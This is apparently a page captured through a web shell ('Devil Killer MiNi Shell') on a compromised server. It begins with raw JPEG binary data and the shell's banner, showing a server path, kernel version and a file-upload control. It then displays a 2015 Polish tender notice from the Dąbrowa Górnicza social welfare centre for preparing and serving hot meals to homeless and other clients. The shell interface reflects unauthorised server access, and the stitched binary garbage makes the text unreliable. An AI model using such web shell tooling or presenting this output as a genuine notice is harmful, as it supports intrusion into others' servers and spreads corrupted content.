JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151208/334654-N-2015.html

<p class="kh_header"><b>Dąbrowa Górnicza: Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej:

Zadanie 1- Przygotowanie oraz wydawanie gorącego posiłku dla bezdomnych klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej.


Ciąg dalszy nazwy zadania znajduje się w pkt. IV.4.16) ogłoszenia</b><br>
<b>Numer ogłoszenia: 334654 - 2015; data zamieszczenia: 08.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , Al. Józefa Piłsudskiego 2, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 262 25 28, faks 32 261 36 94.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej:

Zadanie 1- Przygotowanie oraz wydawanie gorącego posiłku dla bezdomnych klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej.


Ciąg dalszy nazwy zadania znajduje się w pkt. IV.4.16) ogłoszenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiot zamówienia składa się z 5 zadań :
.1.1 Zadanie 1- dotyczy - : Przygotowanie oraz wydawanie gorącego posiłku dla bezdomnych klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej

1) Przewidywana ilość posiłków wynosi: 21 960 na okres 12 miesięcy
a)	Dziennie: maksymalnie     -    60 posiłków dziennie
          minimalnie        -   25 posiłków dziennie
b)	W skali zamówienia: 21 960 posiłków.
2) Ilość gorących posiłków będzie ulegać zmianie w skali zamówienia w zależności od bieżących potrzeb osób kwalifikujących się do tego rodzaju pomocy społecznej w ramach ilości określonej w pkt 1) lit b, z tym zastrzeżeniem, iż w przypadku nie wyczerpania  maksymalnej kwoty zabezpieczonej w budżecie, Wykonawcy nie przysługują z tego tytułu żadne roszczenia, w tym  o zapłatę odszkodowania. Podobnie  Wykonawcy nie przysługują względem Zamawiającego żadne roszczenia, w tym o zapłatę odszkodowania w przypadku nie zapewnienia przez Zamawiającego minimalnej ilości posiłków, gdyż ilość ta jest jedynie szacunkowa, a ryzyko z tego tytułu  zgodnie z wolą stron  obciąża Wykonawcę. 
3) Wykonawca zagwarantuje przygotowanie oraz wydanie gorącego posiłku dla klientów MOPS w odpowiednio przygotowanym pomieszczeniu, zgodnie z przepisami Sanepid- u, BHP i P.poż.
4) Gorący posiłek będzie wydawany codziennie w określonych godzinach, tj. nie krócej niż 3  następujące po sobie godziny dziennie, zaczynając wydawanie nie wcześniej niż o godz. 11.00, a nie później niż o godz. 13.00      
5) Lokal (pomieszczenie), w którym będą wydawane posiłki winien być usytuowany w mieście Dąbrowa Górnicza w odległości nie większej niż 6 km od Centrum Miasta Dąbrowa Górnicza (licząc w linii prostej od Pałacu Kultury Zagłębia - Plac Wolności 1), ze względu na to, iż z gorących posiłków korzystają osoby bezdomne, bezrobotne, które nie posiadają środków finansowych na dojazdy.
6) Posiłki będą urozmaicone według uznania Wykonawcy. 
7) Posiłki muszą być przygotowywane ze świeżych komponentów z uwzględnieniem prawidłowych wartości odżywczych i kalorycznych przy zapewnieniu gramatury określonej w kalkulacji stanowiącej załącznik nr 4a do niniejszej SIWZ.
8) Posiłki będą wydawane w naczyniach jednorazowych, dopuszcza się używanie naczyń wielorazowych przy zachowaniu przepisów higienicznych dotyczących mycia naczyń i stosowania dopuszczonych przez Sanepid środków myjących zgodnie z zasadami systemu HACCP.
9) Wykonawca zobowiązany jest do wywieszania w jadłodajni tygodniowego jadłospisu wraz z gramaturą, a po zakończonym miesiącu dostarczania tygodniowych zrealizowanych jadłospisów do Zamawiającego.
10) Merytoryczny sposób rozliczania i wydawania posiłków będzie uzgodniony z odpowiedzialnymi (wyznaczonymi do kontaktu) w tym zakresie pracownikami Zamawiającego.
11) Wydawanie posiłków będzie się odbywało na podstawie otrzymanego  od upoważnionych pracowników Zamawiającego wykazu osób korzystających z pomocy w formie gorącego posiłku,  wykaz o którym mowa będzie uzupełniany przez Wykonawcę w trakcie trwania miesiąca o osoby, które zostały zakwalifikowane do korzystania z pomocy społecznej w formie gorącego posiłku i otrzymały imienne skierowanie na gorący posiłek od uprawnionych pracowników Zamawiającego.
12) Zamawiający co miesiąc będzie dostarczał wykaz, o którym mowa w pkt 11, tj. wykaz osób bezdomnych korzystających z pomocy w formie gorącego posiłku z wyłączeniem miesiąca stycznia, w którym to miesiącu osoby będą zgłaszały się sukcesywnie z imiennym skierowaniem od Zamawiającego.
13) Wykonawca zobowiązany jest do powiadomienia uprawnionego pracownika Zamawiającego o nieobecności klienta przez okres co najmniej jednego dnia. W przypadku nieobecności klienta w wyznaczonych godzinach w danym dniu, klient nie otrzymuje zaległego posiłku w dniu następnym.
14) Wykonawca otrzyma od Zamawiającego najpóźniej  w ostatni dzień miesiąca, poprzedzający miesiąc rozpoczęcia wydawania posiłków, wykaz osób korzystających z pomocy społecznej w formie gorącego posiłku, o którym mowa w pkt 12.
15) Osoby korzystające z posiłku, będą potwierdzały pobranie posiłku własnoręcznym podpisem na wykazie o którym  mowa powyżej.
16) Zamawiający wyda, każdemu klientowi imienne skierowanie upoważniające go do korzystania z gorącego posiłku, ze wskazaniem daty, od której będzie przysługiwał posiłek.
17) W uzasadnionych sytuacjach uniemożliwiających klientowi spożycie posiłku w określonym terminie w czasie obowiązywania decyzji, Wykonawca nie przygotowuje na wniosek Zamawiającego posiłku(ów) w tym terminie i tym samym nie żąda za ten okres zapłaty. Wniosek o którym mowa w niniejszym punkcie winien być zgłoszony Wykonawcy najpóźniej w dniu poprzedzającym planowaną nieobecność klienta na posiłku.
18) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad wynikających z systemu HACCP oraz zapewnienie właściwej jakości zdrowotnej żywności.
19) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad dotyczących przygotowania i wydawania posiłków zgodnie z wymogami i przepisami Sanepid-u.
20) Wykonawca jest zobowiązany posiadać ważną decyzję (zezwolenie, opinię, protokół) lub inny dokument właściwego inspektora sanitarnego o dopuszczeniu obiektu do przygotowywania posiłków i wydawania posiłków w zbiorowym żywieniu.
21) Wykonawca będzie pobierał i przechowywał próbki każdej składowej części potrawy z dostarczonej partii żywności w ilościach niezbędnych do przeprowadzenia badań laboratoryjnych - zgodnie z obowiązującymi przepisami.
22) Pracownicy przygotowujący i wydający posiłki muszą mieć ważne badania, określone właściwymi przepisami Sanepid.
23) Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu przeprowadzenie kontroli poprawności realizacji postanowień umowy.
24) Wykonawca przejmie odpowiedzialność za szkody wyrządzone przez klientów MOPS.
25) Wykonawca zobowiązany jest do przestrzegania przepisów przeciwpożarowych.

1.2  Zadanie 2 - dotyczy: 
Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej w dzielnicy Dąbrowa Górnicza  - Ząbkowice. 

1) Przewidywana ilość posiłków wynosi: 7 320 na okres 12 miesięcy
a)	Dziennie: maksymalnie     -    20 posiłków  dziennie
          minimalnie        -    15  posiłków dziennie
b)	W skali zamówienia: 7 320 posiłków.
2) Ilość gorących posiłków będzie ulegać zmianie w skali zamówienia w zależności od bieżących potrzeb osób kwalifikujących się do tego rodzaju pomocy społecznej w ramach ilości określonej w pkt 1 lit b, z tym zastrzeżeniem, iż w przypadku nie wyczerpania  maksymalnej kwoty zabezpieczonej w budżecie, Wykonawcy nie przysługują z tego tytułu żadne roszczenia, w tym  o zapłatę odszkodowania. Podobnie  Wykonawcy nie przysługują względem Zamawiającego żadne roszczenia, w tym o zapłatę odszkodowania w przypadku nie zapewnienia przez Zamawiającego minimalnej ilości posiłków, gdyż ilość ta jest jedynie szacunkowa, a ryzyko z tego tytułu  zgodnie z wolą stron  obciąża Wykonawcę. 
3) Wykonawca zagwarantuje przygotowanie oraz wydanie gorącego posiłku dla klientów MOPS w odpowiednio przygotowanym pomieszczeniu, zgodnie z przepisami Sanepid- u, BHP i P.poż.
4) Gorący posiłek będzie wydawany codziennie w określonych godzinach tj.  nie krócej niż 3  następujące po sobie godziny dziennie , zaczynając wydawanie nie wcześniej niż o godz. 11.00, a nie później niż o godz. 13.00      
5) Lokal (pomieszczenie), w którym będą wydawane posiłki winien być usytuowany w mieście Dąbrowa Górnicza w dzielnicy Ząbkowice.
6) Posiłki będą urozmaicone według uznania Wykonawcy. 
7) Posiłki muszą być przygotowywane ze świeżych komponentów z uwzględnieniem prawidłowych wartości odżywczych i kalorycznych przy zapewnieniu gramatury określonej w kalkulacji stanowiącej załącznik nr 4b do niniejszej SIWZ.
8) Posiłki będą wydawane w naczyniach jednorazowych, dopuszcza się używanie naczyń wielorazowych przy zachowaniu przepisów higienicznych dotyczących mycia naczyń i stosowania dopuszczonych przez Sanepid środków myjących zgodnie z zasadami systemu HACCP.
9) Wykonawca zobowiązany jest do wywieszania w jadłodajni tygodniowego jadłospisu wraz z gramaturą, a po zakończonym miesiącu dostarczania tygodniowych zrealizowanych jadłospisów do Zamawiającego.
10) Merytoryczny sposób rozliczania i wydawania posiłków będzie uzgodniony z odpowiedzialnymi (wyznaczonymi do kontaktu) w tym zakresie pracownikami Zamawiającego.
11) Wydawanie posiłków będzie się odbywało na podstawie otrzymanego  od upoważnionych pracowników Zamawiającego wykazu osób korzystających z pomocy w formie gorącego posiłku,  wykaz o którym mowa będzie uzupełniany przez Wykonawcę w trakcie trwania miesiąca o osoby, które zostały zakwalifikowane do korzystania z pomocy społecznej w formie gorącego posiłku i otrzymały imienne skierowanie na gorący posiłek od uprawnionych pracowników Zamawiającego.
12) Zamawiający co miesiąc będzie dostarczał wykaz, o którym mowa w pkt 11, tj. wykaz osób korzystających z pomocy w formie gorącego posiłku z wyłączeniem miesiąca stycznia, w którym to miesiącu osoby będą zgłaszały się sukcesywnie z imiennym skierowaniem od Zamawiającego.
13) Wykonawca zobowiązany jest do powiadomienia uprawnionego pracownika Zamawiającego o nieobecności klienta przez okres co najmniej jednego dnia. W przypadku nieobecności klienta w wyznaczonych godzinach w danym dniu, klient nie otrzymuje zaległego posiłku w dniu następnym.
14) Wykonawca otrzyma od Zamawiającego najpóźniej  w ostatni dzień miesiąca, poprzedzający miesiąc rozpoczęcia wydawania posiłków, wykaz osób korzystających z pomocy społecznej w formie gorącego posiłku, o którym mowa w pkt 12.
15) Osoby korzystające z posiłku, będą potwierdzały pobranie posiłku własnoręcznym podpisem na wykazie o którym  mowa powyżej.
16) Zamawiający wyda, każdemu klientowi imienne skierowanie upoważniające go do korzystania z gorącego posiłku, ze wskazaniem daty, od której będzie przysługiwał posiłek.
17) W uzasadnionych sytuacjach uniemożliwiających klientowi spożycie posiłku w określonym terminie w czasie obowiązywania decyzji, Wykonawca nie przygotowuje na wniosek Zamawiającego posiłku(ów) w tym terminie i tym samym nie żąda za ten okres zapłaty. Wniosek o którym mowa w niniejszym punkcie winien być zgłoszony Wykonawcy najpóźniej w dniu poprzedzającym planowaną nieobecność klienta na posiłku.
18) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad wynikających z systemu HACCP oraz zapewnienie właściwej jakości zdrowotnej żywności.
19) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad dotyczących przygotowania i wydawania posiłków zgodnie z wymogami i przepisami Sanepid-u.
20) Wykonawca jest zobowiązany posiadać ważną decyzję (zezwolenie, opinię, protokół) lub inny dokument właściwego inspektora sanitarnego o dopuszczeniu obiektu do przygotowywania posiłków i wydawania posiłków w zbiorowym żywieniu.
21) Wykonawca będzie pobierał i przechowywał próbki każdej składowej części potrawy z dostarczonej partii żywności w ilościach niezbędnych do przeprowadzenia badań laboratoryjnych - zgodnie z obowiązującymi przepisami.
22) Pracownicy przygotowujący i wydający posiłki muszą mieć ważne badania, określone właściwymi przepisami Sanepid.
23) Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu przeprowadzenie kontroli poprawności realizacji postanowień umowy.
24) Wykonawca przejmie odpowiedzialność za szkody wyrządzone przez klientów MOPS.
25) Wykonawca zobowiązany jest do przestrzegania przepisów przeciwpożarowych.

1.3  Zadanie 3 - dotyczy: 
Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej w  dzielnicy Dąbrowa Górnicza  - Strzemieszyce. 

1) Przewidywana ilość posiłków wynosi:  10 980 na okres 12 miesięcy
a) Dziennie: maksymalnie    -    30 posiłków  dziennie
       minimalnie       -    25 posiłków dziennie
b) W skali zamówienia: 10 980 posiłków.
2) Ilość gorących posiłków będzie ulegać zmianie w skali zamówienia w zależności od bieżących potrzeb osób kwalifikujących się do tego rodzaju pomocy społecznej w ramach ilości określonej w pkt 1 lit b, z tym zastrzeżeniem, iż w przypadku nie wyczerpania  maksymalnej kwoty zabezpieczonej w budżecie, Wykonawcy nie przysługują z tego tytułu żadne roszczenia, w tym  o zapłatę odszkodowania. Podobnie  Wykonawcy nie przysługują względem Zamawiającego żadne roszczenia, w tym o zapłatę odszkodowania w przypadku nie zapewnienia przez Zamawiającego minimalnej ilości posiłków, gdyż ilość ta jest jedynie szacunkowa, a ryzyko z tego tytułu  zgodnie z wolą stron  obciąża Wykonawcę. 
3) Wykonawca zagwarantuje przygotowanie oraz wydanie gorącego posiłku dla klientów MOPS w odpowiednio przygotowanym pomieszczeniu, zgodnie z przepisami Sanepid- u, BHP i P.poż.
4) Gorący posiłek będzie wydawany codziennie w określonych godzinach tj.  nie krócej niż 3  następujące po sobie godziny dziennie , zaczynając wydawanie nie wcześniej niż o godz. 11.00, a nie później niż o godz. 13.00            
5) Lokal (pomieszczenie), w którym będą wydawane posiłki winien być usytuowany w mieście Dąbrowa Górnicza w dzielnicy Strzemieszyce .
6) Posiłki będą urozmaicone według uznania Wykonawcy. 
7) Posiłki muszą być przygotowywane ze świeżych komponentów z uwzględnieniem prawidłowych wartości odżywczych i kalorycznych przy zapewnieniu gramatury określonej w kalkulacji stanowiącej załącznik nr 4c do niniejszej SIWZ.
8) Posiłki będą wydawane w naczyniach jednorazowych, dopuszcza się używanie naczyń wielorazowych przy zachowaniu przepisów higienicznych dotyczących mycia naczyń i stosowania dopuszczonych przez Sanepid środków myjących zgodnie z zasadami systemu HACCP.
9) Wykonawca zobowiązany jest do wywieszania w jadłodajni tygodniowego jadłospisu wraz z gramaturą, a po zakończonym miesiącu dostarczania tygodniowych zrealizowanych jadłospisów do Zamawiającego.
10) Merytoryczny sposób rozliczania i wydawania posiłków będzie uzgodniony z odpowiedzialnymi (wyznaczonymi do kontaktu) w tym zakresie pracownikami Zamawiającego.
11) Wydawanie posiłków będzie się odbywało na podstawie otrzymanego  od upoważnionych pracowników Zamawiającego wykazu osób korzystających z pomocy w formie gorącego posiłku,  wykaz o którym mowa będzie uzupełniany przez Wykonawcę w trakcie trwania miesiąca o osoby, które zostały zakwalifikowane do korzystania z pomocy społecznej w formie gorącego posiłku i otrzymały imienne skierowanie na gorący posiłek od uprawnionych pracowników Zamawiającego.
12) Zamawiający co miesiąc będzie dostarczał wykaz, o którym mowa w pkt 11, tj. wykaz osób korzystających z pomocy w formie gorącego posiłku z wyłączeniem miesiąca stycznia, w którym to miesiącu osoby będą zgłaszały się sukcesywnie z imiennym skierowaniem od Zamawiającego.
13) Wykonawca zobowiązany jest do powiadomienia uprawnionego pracownika Zamawiającego o nieobecności klienta przez okres co najmniej jednego dnia. W przypadku nieobecności klienta w wyznaczonych godzinach w danym dniu, klient nie otrzymuje zaległego posiłku w dniu następnym.
14) Wykonawca otrzyma od Zamawiającego najpóźniej  w ostatni dzień miesiąca, poprzedzający miesiąc rozpoczęcia wydawania posiłków, wykaz osób korzystających z pomocy społecznej w formie gorącego posiłku, o którym mowa w pkt 12.
15) Osoby korzystające z posiłku, będą potwierdzały pobranie posiłku własnoręcznym podpisem na wykazie o którym  mowa powyżej.
16) Zamawiający wyda, każdemu klientowi imienne skierowanie upoważniające go do korzystania z gorącego posiłku, ze wskazaniem daty, od której będzie przysługiwał posiłek.
17) W uzasadnionych sytuacjach uniemożliwiających klientowi spożycie posiłku w określonym terminie w czasie obowiązywania decyzji, Wykonawca nie przygotowuje na wniosek Zamawiającego posiłku(ów) w tym terminie i tym samym nie żąda za ten okres zapłaty. Wniosek o którym mowa w niniejszym punkcie winien być zgłoszony Wykonawcy najpóźniej w dniu poprzedzającym planowaną nieobecność klienta na posiłku.
18) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad wynikających z systemu HACCP oraz zapewnienie właściwej jakości zdrowotnej żywności.
19) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad dotyczących przygotowania i wydawania posiłków zgodnie z wymogami i przepisami Sanepid-u.
20) Wykonawca jest zobowiązany posiadać ważną decyzję (zezwolenie, opinię, protokół) lub inny dokument właściwego inspektora sanitarnego o dopuszczeniu obiektu do przygotowywania posiłków i wydawania posiłków w zbiorowym żywieniu.
21) Wykonawca będzie pobierał i przechowywał próbki każdej składowej części potrawy z dostarczonej partii żywności w ilościach niezbędnych do przeprowadzenia badań laboratoryjnych - zgodnie z obowiązującymi przepisami.
22) Pracownicy przygotowujący i wydający posiłki muszą mieć ważne badania, określone właściwymi przepisami Sanepid.
23) Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu przeprowadzenie kontroli poprawności realizacji postanowień umowy.
24) Wykonawca przejmie odpowiedzialność za szkody wyrządzone przez klientów MOPS.
25) Wykonawca zobowiązany jest do przestrzegania przepisów przeciwpożarowych.

1.4  Zadanie 4 - dotyczy: 
Przygotowanie oraz wydawanie gorącego posiłku dla klientów Miejskiego Ośrodka Pomocy Społecznej w Dąbrowie Górniczej korzystających z pomocy społecznej w dzielnicy Dąbrowa Górnicza  - Centrum Dąbrowa Górnicza. 
Uwaga:
 Lokal (pomieszczenie), w którym będą wydawane posiłki  dot. niniejszego zadania winien być usytuowany w mieście Dąbrowa Górnicza w odległości nie większej niż 4 km od Centrum Miasta Dąbrowa Górnicza (licząc od Pałacu Kultury Zagłębia - Plac Wolności 1),

1) Przewidywana ilość posiłków wynosi: 14 640 na okres 12 miesięcy
a)  Dziennie: maksymalnie      -    40 posiłków  dziennie
          minimalnie        -    30 posiłków dziennie
b)  W skali zamówienia: 14 640 posiłków.
2) Ilość gorących posiłków będzie ulegać zmianie w skali zamówienia w zależności od bieżących potrzeb osób kwalifikujących się do tego rodzaju pomocy społecznej w ramach ilości określonej w pkt 1 lit b, z tym zastrzeżeniem, iż w przypadku nie wyczerpania  maksymalnej kwoty zabezpieczonej w budżecie, Wykonawcy nie przysługują z tego tytułu żadne roszczenia, w tym  o zapłatę odszkodowania. Podobnie  Wykonawcy nie przysługują względem Zamawiającego żadne roszczenia, w tym o zapłatę odszkodowania w przypadku nie zapewnienia przez Zamawiającego minimalnej ilości posiłków, gdyż ilość ta jest jedynie szacunkowa, a ryzyko z tego tytułu  zgodnie z wolą stron  obciąża Wykonawcę. 
3) Wykonawca zagwarantuje przygotowanie oraz wydanie gorącego posiłku dla klientów MOPS w odpowiednio przygotowanym pomieszczeniu, zgodnie z przepisami Sanepid- u, BHP i P.poż.
4) Gorący posiłek będzie wydawany codziennie w określonych godzinach tj.  nie krócej niż 3  następujące po sobie godziny dziennie , zaczynając wydawanie nie wcześniej niż o godz. 11.00, a nie później niż o godz. 13.00          
5) Lokal (pomieszczenie), w którym będą wydawane posiłki winien być usytuowany w mieście- Centrum Dąbrowa Górnicza .
6) Posiłki będą urozmaicone według uznania Wykonawcy. 
7) Posiłki muszą być przygotowywane ze świeżych komponentów z uwzględnieniem prawidłowych wartości odżywczych i kalorycznych przy zapewnieniu gramatury określonej w kalkulacji stanowiącej załącznik nr 4 d do niniejszej SIWZ.
8) Posiłki będą wydawane w naczyniach jednorazowych, dopuszcza się używanie naczyń wielorazowych przy zachowaniu przepisów higienicznych dotyczących mycia naczyń i stosowania dopuszczonych przez Sanepid środków myjących zgodnie z zasadami systemu HACCP.
9) Wykonawca zobowiązany jest do wywieszania w jadłodajni tygodniowego jadłospisu wraz z gramaturą, a po zakończonym miesiącu dostarczania tygodniowych zrealizowanych jadłospisów do Zamawiającego.
10) Merytoryczny sposób rozliczania i wydawania posiłków będzie uzgodniony z odpowiedzialnymi (wyznaczonymi do kontaktu) w tym zakresie pracownikami Zamawiającego.
11) Wydawanie posiłków będzie się odbywało na podstawie otrzymanego  od upoważnionych pracowników Zamawiającego wykazu osób korzystających z pomocy w formie gorącego posiłku,  wykaz o którym mowa będzie uzupełniany przez Wykonawcę w trakcie trwania miesiąca o osoby, które zostały zakwalifikowane do korzystania z pomocy społecznej w formie gorącego posiłku i otrzymały imienne skierowanie na gorący posiłek od uprawnionych pracowników Zamawiającego.
12) Zamawiający co miesiąc będzie dostarczał wykaz, o którym mowa w pkt 11, tj. wykaz osób korzystających z pomocy w formie gorącego posiłku z wyłączeniem miesiąca stycznia, w którym to miesiącu osoby będą zgłaszały się sukcesywnie z imiennym skierowaniem od Zamawiającego.
13) Wykonawca zobowiązany jest do powiadomienia uprawnionego pracownika Zamawiającego o nieobecności klienta przez okres co najmniej jednego dnia. W przypadku nieobecności klienta w wyznaczonych godzinach w danym dniu, klient nie otrzymuje zaległego posiłku w dniu następnym.
14) Wykonawca otrzyma od Zamawiającego najpóźniej  w ostatni dzień miesiąca, poprzedzający miesiąc rozpoczęcia wydawania posiłków, wykaz osób korzystających z pomocy społecznej w formie gorącego posiłku, o którym mowa w pkt 12.
15) Osoby korzystające z posiłku, będą potwierdzały pobranie posiłku własnoręcznym podpisem na wykazie o którym  mowa powyżej.
16) Zamawiający wyda, każdemu klientowi imienne skierowanie upoważniające go do korzystania z gorącego posiłku, ze wskazaniem daty, od której będzie przysługiwał posiłek.
17) W uzasadnionych sytuacjach uniemożliwiających klientowi spożycie posiłku w określonym terminie w czasie obowiązywania decyzji, Wykonawca nie przygotowuje na wniosek Zamawiającego posiłku(ów) w tym terminie i tym samym nie żąda za ten okres zapłaty. Wniosek o którym mowa w niniejszym punkcie winien być zgłoszony Wykonawcy najpóźniej w dniu poprzedzającym planowaną nieobecność klienta na posiłku.
18) Wykonawca będzie ponosił pełną odpowiedzialność za przestrzeganie zasad wynikających z systemu HACCP oraz zapewnienie właściwej jakości zdrowotnej żywności.
